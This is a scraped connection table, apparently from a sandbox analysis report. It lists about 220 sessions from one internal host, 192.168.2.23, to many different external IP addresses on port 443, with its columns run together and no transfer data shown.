                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12208192.168.2.2360698109.105.30.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12209192.168.2.23382601.242.91.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12210192.168.2.2333486147.89.60.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12211192.168.2.2353806166.237.142.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12212192.168.2.2344070158.219.253.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12213192.168.2.2353412203.163.197.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12214192.168.2.234308863.203.34.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12215192.168.2.2343324143.219.197.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12216192.168.2.2359826151.70.189.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12217192.168.2.23426389.189.156.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12218192.168.2.235445240.234.232.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12219192.168.2.233864241.67.95.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12220192.168.2.2357820187.74.54.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12221192.168.2.234561450.132.142.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12222192.168.2.2346910159.146.95.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12223192.168.2.2353828203.48.148.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12224192.168.2.2335270189.94.169.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12225192.168.2.233608468.241.227.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12226192.168.2.2346810203.227.111.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12227192.168.2.23349144.202.100.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12228192.168.2.23437621.251.118.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12229192.168.2.2335570110.237.32.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12230192.168.2.2350908207.24.206.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12231192.168.2.2339976212.208.154.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12232192.168.2.2346706146.229.7.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12233192.168.2.2348984176.190.206.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12234192.168.2.2349640213.141.233.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12235192.168.2.2345500137.155.238.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12236192.168.2.234363073.150.121.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12237192.168.2.2335982172.52.250.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12238192.168.2.2354194174.48.8.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12239192.168.2.2346408212.226.84.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12240192.168.2.235094612.100.139.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12241192.168.2.235619234.109.26.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12242192.168.2.2348630142.117.24.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12243192.168.2.2341630202.59.19.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12244192.168.2.2351008199.249.29.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12245192.168.2.233323451.149.106.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12246192.168.2.233544870.121.145.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12247192.168.2.2332958154.77.129.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12248192.168.2.234669227.188.22.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12249192.168.2.233484468.118.47.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12250192.168.2.2357458186.181.3.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12251192.168.2.2337964135.28.111.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12252192.168.2.2336344142.207.125.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12253192.168.2.2334900159.167.148.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12254192.168.2.234916237.179.121.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12255192.168.2.2338264177.28.253.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12256192.168.2.235592898.243.177.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12257192.168.2.235964236.227.195.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12258192.168.2.2337024105.9.61.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12259192.168.2.2346650101.5.143.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12260192.168.2.2353004117.93.54.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12261192.168.2.2333096108.39.191.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12262192.168.2.2347266151.84.176.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12263192.168.2.2339998116.161.168.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12264192.168.2.2344404134.164.148.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12265192.168.2.2343610122.225.252.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12266192.168.2.2354778184.249.198.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12267192.168.2.2360836202.158.146.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12268192.168.2.2345404202.242.63.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12269192.168.2.235623683.84.4.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12270192.168.2.2341410121.200.175.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12271192.168.2.234884060.204.20.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12272192.168.2.2340908125.174.19.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12273192.168.2.235841844.218.145.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12274192.168.2.2356336169.227.200.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12275192.168.2.2338426187.62.73.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12276192.168.2.234757260.28.155.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12277192.168.2.234799432.133.145.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12278192.168.2.2349134187.199.178.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12279192.168.2.2345182205.87.216.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12280192.168.2.2360678106.134.88.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12281192.168.2.2348950135.78.108.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12282192.168.2.2345440193.112.47.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12283192.168.2.234656085.232.162.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12284192.168.2.2355890195.223.157.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12285192.168.2.235317479.165.190.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12286192.168.2.234369288.109.210.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12287192.168.2.2360952135.238.2.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12288192.168.2.2346944146.205.137.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12289192.168.2.235702451.179.226.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12290192.168.2.2348190169.30.28.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12291192.168.2.2342970105.5.5.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12292192.168.2.2340352174.94.180.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12293192.168.2.2350592203.143.176.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12294192.168.2.234749662.28.218.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12295192.168.2.2348606156.33.195.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12296192.168.2.235499844.163.14.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12297192.168.2.2334140142.128.41.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12298192.168.2.2354292151.154.9.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12299192.168.2.2351672109.96.175.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12300192.168.2.2341128117.23.42.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12301192.168.2.236056445.202.110.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12302192.168.2.235974432.5.92.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12303192.168.2.2359758103.25.66.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12304192.168.2.234286690.86.171.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12305192.168.2.2351074153.51.238.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12306192.168.2.235727640.39.91.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12307192.168.2.2345188100.33.193.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12308192.168.2.234433827.250.240.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12309192.168.2.2340278105.201.164.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12310192.168.2.2351016106.204.68.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12311192.168.2.236027253.202.124.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12312192.168.2.2334524180.94.102.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12313192.168.2.2346916152.46.96.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12314192.168.2.2354046141.125.136.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12315192.168.2.2347548180.253.39.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12316192.168.2.2354572113.211.139.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12317192.168.2.2352286172.220.67.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12318192.168.2.2357304177.251.65.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12319192.168.2.233441650.2.154.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12320192.168.2.235628067.197.107.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12321192.168.2.235204886.18.114.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12322192.168.2.2348746199.38.62.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12323192.168.2.234528636.150.87.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12324192.168.2.2333946185.3.172.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12325192.168.2.234456098.203.170.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12326192.168.2.235427472.194.49.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12327192.168.2.234084275.105.212.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12328192.168.2.2334286216.229.225.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12329192.168.2.2345776108.233.67.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12330192.168.2.234221866.181.22.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12331192.168.2.2352114148.248.212.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12332192.168.2.233892443.112.36.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12333192.168.2.2336808110.240.176.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12334192.168.2.233517854.131.194.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12335192.168.2.2351532164.195.211.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12336192.168.2.234808466.128.55.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12337192.168.2.234308280.79.156.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12338192.168.2.234559897.226.230.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12339192.168.2.2360622202.111.42.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12340192.168.2.2359206218.141.212.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12341192.168.2.234739865.54.242.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12342192.168.2.234313466.133.150.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12343192.168.2.2356784116.119.230.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12344192.168.2.234270082.200.202.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12345192.168.2.235151063.89.112.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12346192.168.2.234152053.180.36.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12347192.168.2.2360758167.87.169.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12348192.168.2.2355576176.175.11.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12349192.168.2.2358574153.180.48.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12350192.168.2.234368646.2.255.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12351192.168.2.2346660124.71.143.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12352192.168.2.235816272.225.200.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12353192.168.2.2337394194.58.81.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12354192.168.2.234108663.55.197.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12355192.168.2.2348798170.21.254.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12356192.168.2.2353206108.171.178.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12357192.168.2.2357916157.197.220.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12358192.168.2.2353066190.209.11.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12359192.168.2.23567922.4.206.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12360192.168.2.233614813.214.148.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12361192.168.2.2354438161.136.202.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12362192.168.2.234848296.226.208.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12363192.168.2.2337020148.40.145.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12364192.168.2.2338438197.44.249.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12365192.168.2.2347158114.207.144.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12366192.168.2.235225045.65.106.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12367192.168.2.2347694201.9.232.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12368192.168.2.2345958193.18.185.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12369192.168.2.23544122.249.136.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12370192.168.2.2355986207.238.1.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12371192.168.2.2342754196.124.135.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12372192.168.2.233848841.167.153.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12373192.168.2.2338630199.43.54.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12374192.168.2.2351616206.123.126.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12375192.168.2.234804876.216.78.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12376192.168.2.2341074183.46.132.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12377192.168.2.2344046208.245.227.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12378192.168.2.2354740101.100.74.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12379192.168.2.2335390212.92.94.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12380192.168.2.2347142180.153.97.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12381192.168.2.2360100131.27.169.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12382192.168.2.235023876.175.89.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12383192.168.2.233361058.53.100.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12384192.168.2.235479234.130.63.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12385192.168.2.2348962201.223.238.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12386192.168.2.234480017.86.152.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12387192.168.2.234912882.235.255.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12388192.168.2.2352074131.51.200.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12389192.168.2.23598821.138.229.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12390192.168.2.234625237.109.123.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12391192.168.2.233874093.91.93.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12392192.168.2.233407414.69.175.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12393192.168.2.233919823.60.47.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12394192.168.2.235526434.47.252.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12395192.168.2.2344488115.56.40.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12396192.168.2.234913874.151.243.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12397192.168.2.2333398192.123.50.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12398192.168.2.233914457.28.178.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12399192.168.2.23449382.140.253.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12400192.168.2.2335718165.74.148.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12401192.168.2.235383047.66.198.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12402192.168.2.2344268129.23.7.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12403192.168.2.233591697.118.196.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12404192.168.2.235176281.45.103.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12405192.168.2.2352072106.122.121.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12406192.168.2.2334700133.90.194.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12407192.168.2.23570088.90.214.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12408192.168.2.234609672.99.153.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12409192.168.2.2342858204.131.77.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12410192.168.2.234005619.54.46.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12411192.168.2.234255280.33.51.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12412192.168.2.233877683.118.214.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12413192.168.2.2352656203.154.49.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12414192.168.2.235377472.106.11.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12415192.168.2.235526690.134.196.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12416192.168.2.2350918149.215.101.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12417192.168.2.235636225.237.175.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12418192.168.2.2340702120.183.100.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12419192.168.2.2342488200.246.133.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12420192.168.2.2357550211.132.61.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12421192.168.2.2359332160.193.20.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12422192.168.2.2333980166.123.224.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12423192.168.2.2351266122.238.0.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12424192.168.2.2337092123.38.208.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12425192.168.2.23383728.232.46.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12426192.168.2.233877836.152.156.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12427192.168.2.2357410169.133.185.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12428192.168.2.2338428106.79.115.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
